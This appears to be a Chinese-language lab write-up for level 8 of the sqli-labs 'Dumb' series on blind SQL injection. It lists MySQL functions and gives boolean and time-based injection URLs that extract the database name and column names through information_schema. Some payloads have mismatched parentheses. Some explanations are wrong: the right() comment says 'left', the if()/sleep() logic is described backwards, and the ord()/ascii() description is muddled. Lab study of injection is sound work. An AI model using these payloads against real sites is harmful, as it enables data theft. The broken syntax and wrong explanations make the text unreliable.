SQLI DUMB SERIES-8

SQLI DUMB SERIES-8思路

?id=1'--+

构造闭合发现没有回显

则我们使用盲注

盲注分为几种 

布尔型盲注

Length() //返回字符串长度

Substr() //取字符串 用法同下

mid() //mid(ABC,1,2)意为从ABC中的第一个字符开始取 取两个字符 则返回值为AB

left() //left（ABC,2）取字符串左边的几位 返回值为AB

right() //right（ABC,2）取字符串左边的几位 返回值为BC

ord()/ascii() //返回一个字符的ASCII码/返回一个数字对应ASCII码的字符

hex() //返回16进制数 hex编码

?id=1’ and mid(database(),1,8)=‘security’--+

时间型盲注

sleep（1） //睡1秒

交互时睡1秒

不交互时不延迟

if（）函数 //判断后，true返回3，false返回4

if（1=1,3，4） 返回3

if（1=2,3，4） 返回4

?id=1’ and if(1=2,1,sleep(5))—+ //判断闭合

如果1=2正确 则睡眠5S 将1=2替换成SQL语句后可盲注

id=1’ and if((length(database()>1),sleep(4),0)--+ //增加1值来猜库名的长度

id 1’ and if((ascii(substr(database(),1,1)))>1),sleep(4),0)--+ //库名

id 1’ and if((ascii(substr((select column_name from information_schema. columns where TABLE_name = ‘your table’ and table_schema = 'your database’limit 0,1),1,1))>1),sleep(4),0)--+ //表名

--------------------------------------------------------------------------------------------------------------------------------------------------------------------

通过改变盲注的ascii码来猜库名